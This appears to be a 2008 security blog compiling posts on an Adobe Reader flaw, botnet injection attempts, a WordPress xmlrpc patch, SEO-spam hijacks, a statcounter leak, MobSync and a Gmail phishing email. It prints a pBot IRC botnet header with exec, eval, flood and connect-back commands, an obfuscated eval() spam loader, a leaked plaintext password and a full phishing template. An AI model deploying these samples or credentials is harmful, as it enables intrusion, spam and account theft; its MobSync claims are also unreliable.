A JavaScript Buffer Overflow in Adobe Acrobat, Acrobat 3D & Reader allowed remote attacker to execute arbitrary code. The code will run with the privileges of the target user opening the PDF document.

Excerpt from iDefense Public Advisory;

Adobe Reader and Acrobat implement a version of JavaScript in the EScript.api plug-in which is based on the reference implementation used in Mozilla products. One of the methods exposed allows direct control over low level features of the object, which in turn allows execution of arbitrary code.

Workaround

Disabled Adobe Reader & Acrobat JavaScript. Perform Update ↓

Update -Adobe Acrobat & Reader version 8.1.2

Adobe released version 8.1.2 of Adobe Reader, Acrobat & Acrobat 3D to address
these vulnerabilities.

• Adobe Reader 7 and 8 users update to Adobe Reader 8.1.2
• Acrobat 8 users on Windows update to Acrobat 8.1.2
• Acrobat 8 users on Macintosh update to Acrobat 8.1.2
• Acrobat 3D version 8 users on Windows update to Acrobat 3D version 8.1.2

These vulnerabilities were discovered by Greg MacManus of VeriSign iDefense Labs.

Related Posts

• How to safely remove AcroRd32Info.exe (Adobe Reader)

External Links

• Security update available for Adobe Reader and Acrobat 8 (APSA08-01)

Today’s we just upgrade from WordPress 2.3.2 to 2.3.3 security release. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts ↓. The first attacker is from 212.24.62.200 → udkado.ru masking their useragent as Googlebot (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the attacker data to abuse network and IronPort.

The next few hours we received 20 attack from the same bot-herder. They probably has a large scale of DDNS (china → korea → us ). Noticeably the scans pattern is predictable. From our Feb 5th attack all these botnet is targeting certain search keywords security, injection so we setup a honey-pot right on that particular URL.

Hacking Attempts on Kakkoi

Sort by Injection type.

The Bot-herder Host

Part of class pBot source taken from http://basiclifesaving.org/mycomments/rom.txt

<? 

/*
 *
 * #crew@corp. since 2003
 * edited by: devil__ <admin@xdevil.org>
 *
 * COMMANDS:
 *
 * .user <password> //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail <to> <from> <subject> <msg> //send an email
 * .dns <IP|HOST> //dns lookup
 * .download <URL> <filename> //download a file
 * .exec <cmd> // uses exec() //execute a command
 * .sexec <cmd> // uses shell_exec() //execute a command
 * .cmd <cmd> // uses popen() //execute a command
 * .info //get system information
 * .php <php code> // uses eval() //execute php code
 * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
 * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
 * .raw <cmd> //raw IRC command
 * .rndnick //change nickname
 * .pscan <host> <port> //port scan
 * .safe // test safe_mode (dvl)
 * .inbox <to> // test inbox (dvl)
 * .conback <ip> <port> // conect back (dvl)
 * .uname // return shell's uname using a php function (dvl)
 *
 */

set_time_limit(0);
error_reporting(0);
echo "Ok unlocker. We did i!";

class pBot
{
 var $config = array("server"=>"Bucharest.ro.eu.ultra-chat.org",
 "port"=>"6667",
 "pass"=>"n",
 "prefix"=>"[R]",
 "maxrand"=>"4",
 "chan"=>"#unlocker",
 "chan2"=>"#unlocker",
 "key"=>"n",
 "modes"=>"+p",
 "password"=>"n",
 "trigger"=>".",
 "hostauth"=>"Robert.users.ultra-chat.org" // * for any hostname (remember: /setvhost xdevil.org)
 );

Related Posts

• Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008
• Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan

External Links

• Wikipedia → Botnet
• Storm Botnet
• Dynamic DNS

I received lots of multiple botnet injection (e.g: code & sql) on my wordpress blog. All the failed attempts from these Botnet (Bot-herder) will be published in this post. Somebody might find the informations useful ↓.

Failed Hacking Attempts

Sort by Injection type.

Related Posts

• Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan

External Links

• Wikipedia → Botnet
• Storm Botnet

This issue has been raised 4 months ago (october 2007). Certainly this is one of BadPress Ticketing Problems. Until WordPress Developer release Official securities fix (v 2.3.2.1 || 2.3.5 ?? ) You might want to try this “debatable” patch by SecuriTeam - Paul (Yabba) Jones.

Note: Matt Mullenweg & the WP-Hackers is against secureTeam “hasty-patch” and their POC release. [wp-hackers] xmlrpc issue or no?.

Excerpt from Wordpress Support Forum » iframe injection problem?

Matt Mullenweg → [...] I would rather not have people think they’re safe and really not be, and there is a release coming shortly anyway. [...]
If anyone is scared and wants a fix NOW, they should either turn off registration (which is off by default) or delete xmlrpc.php. ~ Feb 3, 2008

WordPress 2.3.3 has been release it’s advice not to try this patches

Patch xmlrpc.php via WordPress Admin

1. Login to Wordpress Admin
2. Goto Manage » Files then scroll down to “Other Files” sections, type in xmlrpc.php. otherwise type the following URL in your browser address-bar ↓

   mydomain.com/wp-admin/templates.php?file=xmlrpc.php&submit=Edit+file+%C2%BB

3. Find the following code (around Line 1151 - 1203 ) within wp_xmlrpc_server::mw_editPost() class methods ↓

   if ( ( 'post' == $post_type ) && !current_user_can('edit_post', $post_ID) )

4. Replace with

   //if ( ( 'post' == $post_type ) && !current_user_can('edit_post', $post_ID) )
    if ( ( 1 || 'post' == $post_type ) && !current_user_can('edit_post', $post_ID) )
   

   saved.

5. Disabled New User Registrations for temporary.

External Links

• Wordpress Support Forum → iframe injection problem?
• SecuriTeam → WordPress 2.3.2 XMLRPC Vulnerability POC
• Wikipedia XML-RPC
• Google → Wordpress XML-RPC Vulnerabilities
• PHPXREF wp-trunk xmlrpc source

Being Hacked by SEO spammer is seem like a yearly events at Mattheaton.com. Matt’s WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at → Matt Heaton BlueHost HostMonster CEO Official Blog Hacked.

It’s a big embarrassment for bluehost & hostmonster hosting to have their CEO’s blog being spamride every year (since 2007) . Drilling Matt Heaton’s with bad ads wont solves the Blackhat Spam issues, I will left that particulars part to my readers to speculate.

Mattheaton Goro Spam Chronology

Wordpress.net.in GORO Spam Pattern

• All the infected sites will stop being index by archive.org few months before the spam started.
• From Nov 2007 to Jan 2008 (Right after Google Mass P3 De-rank fever) - The Blackhat Goro Spammer is targeting PR6 & PR7 sites running on WordPress (2.3.1 below) and on some rare case (tangonoticias.com) Joomla CMS (1.0.x)
• I categorize this blackhat method as Sybil Attack
  

  A Sybil attack is one in which an attacker subverts the reputation system by creating a large number of pseudonymous entities, and using them to gain a disproportionately large influence. A reputation system’s vulnerability to a Sybil attack depends on how cheaply Sybils can be generated, the degree to which the reputation system accepts input from entities that do not have a chain of trust linking them to a trusted entity, and whether the reputation system treats all entities identically.

  - Derank and manipulate their victim host to boost their pharmaceutical products on Google Local Search Index (gaming Localrank for better SERP)

• Goro signatures:
  1. html div with id “goro”

     <div id="goro"> <a href=">...</a> </div>
     

  2. javascript function name “getme()”

     <script type="text/javascript">function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </script>
     

  3. Output spam on WordPress wp_footer & wp_head hook

Blackhat SEO Spamdexing Google Local Search Index

The below graph explain the Blackhat SEO Spamdexing methods for Manipulating Google Local SERP.

View Spamdexing Google Local Search Image

Note: A blackhat at hoqwarts ;)

ScreenGrab

• mattheaton.com Jan 28 2008 (1009 x 6576 pixels)
• brainwave-india.com Jan 28 2008 (1016 x 2306 pixels)
• Google Local Search Jan 28 2008 Spamdexing Results
• stc-israel.org.il Jan 28 2008 spamdexing page (hidden text)
• stc-israel.org.il Jan 28 2008 spamdexing page (text reveal)

Recent Update

• Feb 1, 2008 - we send a letter to matt@bluehost.com regarding this issue. Still waiting for his replies
• Feb 3, 2008 - The Blackhat Goro Spammer change their target spamhost from http://www.brainwave-india.com (PR6) to http://www.thinkingphp.org (PR6) - Felix Geisendörfer.

  <div id="goro"><a href="http://www.thinkingphp.org/?read=796 ... prescription</a></div><script type="text/javascript">function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </script>

  thinkingphp.org blog is running on WordPress 2.3.2. We send him email regarding the Goro Spam hijack.

• Feb 8th 2008, There is no signature of Goro spam (tag with id goro) on Matt’s blog the blackhat is now using Inline CSS Position Overflow to hide the spams links ↓ redirect to zoorender.com (PR6).

  <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://www.zoorender.com/?discount=1776">buying .. </div>
  

• Feb 13th 2008, Same methods as above (inline css cloacking) .
  • HTML Code shown to a Regular Browser → 32,246 characters
  • HTML Code shown to Google Bot → 34,646 characters

  redirect to blog.jensfranke.com (PR7).

  <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://blog.jensfranke.com/?read=606">buy generic fi
  

• Feb 20th 2008, CSS Cloacking redirect to http://www.entrepreneur27.org/ (PR6).

  <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://www.entrepreneur27.org/?more=1591">bad side effects of viagra</a>&nbsp;<a href="http://www.entrepreneur27.org/?more=1592"> ...
  </div>
  

• Feb 24th 2008, CSS Cloacking redirect to http://www.latenightpc.com (PR5). mattheaton-com-022408-source.txt
• Feb 26th 2008, CSS Cloacking redirect to http://www.communitynext.com/ WordPress 2.3.3 (PR6). mattheaton-com-022608-source.txt

Related Posts

• How to Removed wordpress.net.in Spam Injection
• Matt Heaton BlueHost HostMonster CEO Official Blog Hacked

External Links

• Bluehost & Hostmonster CEO’s Blog
• National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities
• Wikipedia → Spamdexing
• pseudo-flaw - more random wordpress blogs owned by seo spammers

Gianni Amato found a vulnerability in statcounter that can expose ip2location database log and account credentials.

The Vulnerability

The vulnerability exists in statcounters backup log inside utils directory where the file update.sh reside.

• googlecache: *.statcounter.com/utils/update.sh

Excerpt from Giani Amot:

The server where the backup’s log of the last three days are situated is badly set. The access for all directory by server is free, include “utils” directory that contains one script file called “update.sh” inside of which are situated the user and password to enter and download the database log from ip2location.com

Update.sh

cd /home/ip2location

/usr/bin/curl --data 'login=webmaster@statcounter.com&password=kOFr3VTh' 'http://www.ip2location.com/download.aspx?productcode=db6bin' > /home/ip2location/ipdb_current.bin.zip

rm /home/ip2location/ipdb_new.bin

unzip -p /home/ip2location/ipdb_current.bin.zip *.BIN > /home/ip2location/ipdb_new.bin

if [ "$?" -ne "0" ]; then

 echo "Sorry, new ip_db archive isn't valid!"

 exit 1

fi

mv /home/ip2location/ipdb_new.bin /home/ip2location/ipdb.bin

rm /home/ip2location/ipdb_current.bin.zip

/bin/cp /home/ip2location/ipdb.bin /mnt/rd/ipdb.bin

htaccess workaround

places the following .htaccess code inside statscounter /utils/ directory

#deny access to any file with *.sh filetypes
<Files ~ "^\.sh">
 Order allow,deny
 Deny from all
 Satisfy All
</Files>

#Deny request for *.log & comment files
<Files ~ "^.*\.([Ll][Oo][Gg]|[cC][oO][mM][mM][eE][nN][tT])">
 Order allow,deny
 Deny from all
 Satisfy All
</Files>

password protected directories

AuthType Basic
AuthName "restricted area"
AuthUserFile /usr/local/etc/.htpasswd-allusers
require valid-user

Note: You will need to change the AuthUserFile password file location depending on your server configurations.

External Resources

• Giani Amato → Se fossi tu a monitorare Statcounter.com?
• Giani Amato → Se fossi tu a monitorare Statcounter.com » English Translations

I just upgrade today, WordPress 2.3.2, fixed a nasty vulnerability. I haven’t did any test yet but according to “blackhat domainer” you can view WordPress Draft Entry via simple URL parameters without log in (un-authorize view).

WordPress developer had to release this ’securities’ fixes before the upcoming 2.4. You could either wait for 2.4 (the milestone is almost ready?) or upgrade immediately. But before others exploit this vulnerability its better to upgrade.

Peter Westwood’s sum up all wordpress 2.3.2 recent change and update in details. Read it first before you decide to upgrade.

External Links

• How to know today what ShoeMoney is going to post tomorrow
• Wordpress 2.3.2 Announcements (dev blog)

MobSync is a Microsoft Mobile Synchronization Manager available in Win 2000 & Windows XP

Excerpt from Microsoft KB 314512 Articles (2002)

The Windows XP Synchronization Manager helps ensure that the files and folders on your mobile device and your desktop computer stay synchronized. With Synchronization Manager, you can be sure you are always working with the latest copy of your data, online or offline.

Technically MobSync is part of Windows Memory Management, its prefetch (type of cache) your External Device Contents (Mobile PC, Windows Embed XPE, PDA,database etc .. ) thus helps speed up the Windows booting process by shortening the time external device programs takes to start up.

MobSync Issue

MobSync is registered to run on logon but the process is hidden on others ‘Scans Tools’ like Autoruns.exe & Process.exe (SysInternal).

QuickFact:

• MobSync.exe can record inputs.
• Its hide itself from monitor applications.

Apparently because of its transparencies nature to hide behind windows systems some hackers decide to reverse engineer this programs as a Trojan Rootkit.

Should I disabled Mobsync?

If you used windows for surfing and office works you probably wont need this programs (crapware) most modern mobile device has a build in Synchronization Manager and doesnt relies on microsoft mobsync (dependencies issue). Its recommended to disabled this programs as it can hide itself from being monitored and doesnt showup on running process lists.

Step by step guide to disabled MobSync from your windows.

1. Disabled System Restore

   You will need to disabled Windows System Restore (Temporary).

2. View hidden system files

   Suspicious files is known to hide itself as Windows System files. The following settings will set all hidden files viewable so we could removed it.

   • Click on Windows Start → Control Panel → Folder Options → View Tab
   • Turn on the option to show hidden files

3. Clean Temporary Files and Windows Prefetch Files

   This wont harm your system. Removes all files inside the following directory. Remove the contents only not the folders.

   • C:\temp
   • C:\windows\temp
   • C:\Documents and Settings\<username>\Local Settings\Temp
   • C:\windows\prefetch

4. Boot in SafeMode

   Restart your PC in safe mode. Refer KB 31522 on How To Boot in Safe Mode.

5. Disabled MobSync Process

   1. Click on start → Run → mobsync
   2. Next, Click on Setup buttons
   3. On “Synchronizations Settings” Windows Logon/Logoff tab un-check all the following options:

      Automatically Synchronize the following items:

      • When I log on to my computer
      • When I log off to my computer
   4. While still in “Synchronizations Settings” Windows select the next tab label “on Idle” un-check the following items:
      • Synchronize the selected items while my computer is idle

6. Removed from system registry

   If you arent familiar with registry you may skip this part. Most normal startup programs can be found at the following registry path.

   • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
   • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
   • HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
   • HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
   • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
   • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

   In Windows XP all loaded “startup programs” (start menu/startup items) can be found at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg

   Mobsync registry HKLM\Software\Microsoft\Windows\CurrentVersion\syncmgr

Note on using Rootkit Scanner.

• James A. Eshelman HijackThis
• SysInternal RootkitRevealer
• F-secure Blacklight

Most advance Rootkit has a self mechanism to shutdown the system if any of this programs is identify in the memory. If you had this programs installed its advice to rename the programs first.

• RootKitRevealer.exe → RKV.exe
• HijackThis → hjct.exe

How to validate if the running programs is Tempered

Get Certificate Verification Tool ( WM Software Corp) and verify the programs signature or you could also run Microsoft sigverif.exe (c:\windows\SIGVERIF.TXT) to verify digital signature.

Caveat: Most Rookit is “padded/mugged” with unix controls character so its not readable by Windows (ANSI).

Setupapi.log entries

Setupapi.log can be found inside c:\windows\setupapi.log You need to enabled logging in verbose mode to get proper setup log.
HKLM\Software\Microsoft\Windows\CurrentVersion\SetupLogLevel

Insert DWORD value 0000FFFF to enabled verbose mode logging

Insert DWORD value 0 to disabled it

Tempered MobSync.exe & similar windows networks files.

An unsigned or incorrectly signed file
(c:\windows\msdownld.tmp\as03b1e1.tmp\mobilepk.inf) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\msidle.dll to
C:\WINDOWS\SYSTEM\msidle.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\msidle.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.exe to
C:\WINDOWS\SYSTEM\mobsync.exe.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.exe) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.dll to
C:\WINDOWS\SYSTEM\mobsync.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sens.dll to
C:\WINDOWS\SYSTEM\sens.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sens.dll) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sensapi.dll to
C:\WINDOWS\SYSTEM\sensapi.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sensapi.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\senscfg.dll to
C:\WINDOWS\SYSTEM\senscfg.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\senscfg.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\es.dll to
C:\WINDOWS\SYSTEM\es.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\es.dll) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esshared.dll to
C:\WINDOWS\SYSTEM\esshared.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esshared.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\estier2.dll to
C:\WINDOWS\SYSTEM\estier2.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\estier2.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sage.vxd to
C:\WINDOWS\SYSTEM\sage.vxd.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sage.vxd) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esenu.dll to
C:\WINDOWS\SYSTEM\esenu.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esenu.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.inf to
C:\WINDOWS\INF\mobilepk.inf.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.inf) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\chnscsvr.hlp to
C:\WINDOWS\help\chnscsvr.hlp.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\chnscsvr.hlp) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.cat to
C:\WINDOWS\SYSTEM\sfp\ie\mobilepk.cat.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.cat) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.hlp to
C:\WINDOWS\help\mobsync.hlp.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.hlp) was installed. Error
0xe000022f: The third-party INF does not contain digital signature information.

Summary

What really bother me, is Microsoft Windows Setup API. Any downloaded Microsoft system files has embed sign-in digital signature. Windows installation will validate all setup file and logs out error if the file has a bad signature (third party signature or file being tempered). The flaw is within the Windows Setup API itself. It doesn’t protect you from installing bad programs.

You should thanks Microsoft developer for making good Installation Programs and reporting tools. it remind you of error but installed it nonetheless.

External Links

• MSDN System Event Notification Service (SENS)

Below is typical phishing email I received on Dec 8, 2007. It was send to one of my active gmail accounts.

The Email Header

From

“Gmail Team” <customercareteamalert4@gmail.com>

Subject

Gmail Warning!!!! Verify Your Gmail Account To Avoid Close.

Part of the message ↓

Dear member,

This message is from gmail message center to all gmail free account owners
and premium account owners. We are currently upgrading our data base and
e-mail account center. We are deleting all unused gmail account to create
more space for new accounts.

*To prevent your account from closing, you will have to verify it below so
that we will know that it’s a present used account.*

* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!! [...]

Raw Email Content

This are part of of the raw message on gmail its not download via pop3. Certain meta info is not available as its got filtered by gmail services (spam automatic removal).

Delivered-To random-victims-name@gmail.com
Received: by 10.114.235.19 with SMTP id i19cs230694wah;
 Sat, 8 Dec 2007 04:27:12 -0800 (PST)
Received: by 10.141.20.7 with SMTP id x7mr3231780rvi.1197116792300;
 Sat, 08 Dec 2007 04:26:32 -0800 (PST)
Received: by 10.141.115.15 with HTTP; Sat, 8 Dec 2007 04:26:32 -0800 (PST)
Message-ID: <2f83b9150712080426n4a018c86mc2af4a4ed271f223@mail.gmail.com>
Date: Sat, 8 Dec 2007 13:26:32 +0100
From: "Gmail Team" <customercareteamalert4@gmail.com>
Reply-To: customercareteamalert2@gmail.com
Subject: Gmail Warning!!!! Verify Your Gmail Account To Avoid Close.
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_Part_11145_31274162.1197116792293"

------=_Part_11145_31274162.1197116792293
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

 Dear Member*,* **
 * Account Alert*
***
 *
 *VERIFY YOUR GMAIL ACCOUNT NOW TO AVOID CLOSE !!!*
***GMAI L
*Dear Member*,*
 This message is from gmail message center to all gmail free account owners
and premium account owners. We are currently upgrading our data base and
e-mail account center. We are deleting all unused gmail account to create
more space for new accounts.

 *To prevent your account from closing, you will have to verify it below so
that we will know that it's a present used account.*

* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!!

 <http://amazon.com/>
 Gmail! ID:.........................

 Password:........................

 Your Birthday:.................

 Your Country or Territory:...........
 Enter the Security
Characters:......... [image: Registration
Verification Code]
*

 *Warning!!! **Account owner that refuses to update his or her account
before two weeks of receiving this warning will lose his or her account
permanently. *
**
*Sincerely,*
*Gmail Team*

------=_Part_11145_31274162.1197116792293
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

<table style="WIDTH: 595px; HEIGHT: 813px" width="595" border="0">
<tbody>
<tr bgcolor="#cccc99">
<td valign="center" colspan="3"><font face="Arial,Helvetica" color="#333300" size="+0"><span style="FONT-SIZE: 13px; FONT-FAMILY: Arial">Dear&nbsp;<font size="3">Member</font><strong>,</strong></span></font></td></tr>
<tr>
<td colspan="3"><font face="Arial,Helvetica" size="-1">
<div align="center"><font face="Arial Cyr" size="2"><span style="FONT-SIZE: 13px; FONT-FAMILY: Arial"><font face="Arial Cyr" size="2"><font face="Arial Cyr" size="2"><span style="FONT-SIZE: 23px; FONT-FAMILY: Arial"><b><font color="#dd6600">
<img style="WIDTH: 430px; HEIGHT: 99px" height="330" src="http://www.google.com/intl/en/press/images/logos/gmail.jpg" width="418"></font></b></span></font></font></span></font></div>
<div align="center">
<div><font face="Arial Cyr" size="2"><span style="FONT-SIZE: 13px; FONT-FAMILY: Arial"><font face="Arial Cyr" size="2"><font face="Arial Cyr" size="2"><span style="FONT-SIZE: 23px; FONT-FAMILY: Arial"><b><u><font color="#ff0000">
&nbsp;Account Alert</font></u></b></span></font></font></span></font></div></div>
<div align="center"><font face="Arial Cyr" size="2"><span style="FONT-SIZE: 13px; FONT-FAMILY: Arial"><font face="Arial Cyr" size="2"><font face="Arial Cyr" size="2"><span style="FONT-SIZE: 23px; FONT-FAMILY: Arial"><strong>
</strong></span><b><u><font face="Arial" color="#ff0000"></font></u><br>&nbsp; </b></font></font></span></font></div>
<div align="center">
<table cellspacing="0" cellpadding="4" width="585" border="0">
<tbody>
<tr bgcolor="#a0b8c8">
<td colspan="2">
<div align="center"><font face="Arial"><font face="Arial Narrow" size="4"><u><strong>VERIFY YOUR GMAIL ACCOUNT NOW TO AVOID CLOSE&nbsp;!!!</strong></u></font></font></div></td></tr></tbody></table></div>
<div align="center"><font face="Arial Cyr" size="2"><font face="Arial Cyr" size="2"><font face="Arial Cyr" size="2"><strong><font size="5"><font face="arial"></font></font></strong></font></font></font><font face="Arial Cyr" size="2">
<font face="Arial
 Cyr" size="2"><font face="Arial Cyr" size="2"><strong><font face="Arial"><font size="7"><u><font color="#0000bf">G</font><font color="#ff0000">M</font><font color="#ffff00">A</font><font color="#0000bf">I</font><font color="#007f40">
 L</font></u></font></font><br></strong><span style="FONT-SIZE: 21px; FONT-FAMILY: Arial"><font color="#ff0000">Dear</font><font color="#ff0000">&nbsp;Member</font><font color="#ff0000"><strong>,</strong></font></span></font></font>
 </font></div></font></td></tr>
<tr>
<td><font face="Arial Cyr" color="#124282" size="2"><span style="FONT-SIZE: 13px; FONT-FAMILY: Arial">
<div class="MsoNormal"><span style="FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial"><font color="#0000ff"><span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"><font color="#00007f">This message is from gmail message center to all&nbsp;gmail free account owners and premium account owners. We are currently upgrading our data base and e-mail account center. We are deleting all unused&nbsp;gmail account to create more space for new accounts.
</font></span></font></span></div>
<div class="MsoNormal"><span style="FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial"></span>&nbsp;</div>
<div class="MsoNormal">
<div class="MsoNormal" style="MARGIN: 0in 0in 0pt"><font face="Times

 New

 Roman"><strong>To prevent your account from closing, you will have to&nbsp;verify it&nbsp;below so that we will know that it&#39;s a present used account.</strong></font></div><span style="FONT-SIZE: 10pt; COLOR: rgb(18,66,130)">
</span></div>
<div class="MsoNormal"><span style="FONT-SIZE: 10pt; COLOR: rgb(18,66,130)"></span>&nbsp;</div>
<div class="MsoNormal"><strong><span style="FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial">
<table cellspacing="0" cellpadding="4" width="585" border="0">
<tbody>
<tr bgcolor="#a0b8c8">
<td colspan="2"><font size="4">
<div><strong>
<font size="4">
<div><strong>CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!!</strong> </div></font></strong></div></font></td></tr></tbody></table>
<div><strong><font size="5"><font face="arial">&nbsp;
<div>
<div><img style="WIDTH: 469px; HEIGHT: 75px" height="75" src="http://pics.ebaystatic.com/aw/pics/securityCenter/hdr1_649x75.gif" width="649"></div>
<div><font size="2"><font face="Verdana"><strong><a href="http://amazon.com/" target="_blank" rel="nofollow"><span id="lw_1190759841_12"><font color="#003399"></font></span></a></strong></font></font>&nbsp;</div></div></font>
</font></strong></div>
<div><strong><font size="5"><font face="arial"><font face="arial narrow" size="4">
<div class="MsoNormal" style="MARGIN: 0in 0in 0pt"><strong><span style="FONT-SIZE: 13.5pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Gmail! ID:.........................</span></strong></div>
<div class="MsoNormal" style="MARGIN: 0in 0in 0pt"><strong><span style="FONT-SIZE: 13.5pt"></span></strong>&nbsp;</div>
<div class="MsoNormal" style="MARGIN: 0in 0in 0pt"><strong><span style="FONT-SIZE: 13.5pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Password:........................</span></strong></div>
<div class="MsoNormal" style="MARGIN: 0in 0in 0pt"><strong><span style="FONT-SIZE: 13.5pt"></span></strong>&nbsp;</div>
<div class="MsoNormal" style="MARGIN: 0in 0in 0pt"><font size="4"><font face="arial narrow"><strong style="FONT-FAMILY: arial narrow"><span style="FONT-SIZE: 13.5pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Your Birthday:.................</span></strong>
 </font></font></div>
<div class="MsoNormal" style="MARGIN: 0in 0in 0pt"><font size="4"><font face="arial
 narrow"><strong style="FONT-FAMILY: arial narrow"><span style="FONT-SIZE: 13.5pt"></span></strong></font></font>&nbsp;</div>
<div class="MsoNormal" style="MARGIN: 0in 0in 0pt"><strong><span style="FONT-SIZE: 13.5pt"><label for="persistent"></label>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Your Country or Territory:...........</span></strong> </div></font></font></font></strong>
</div>
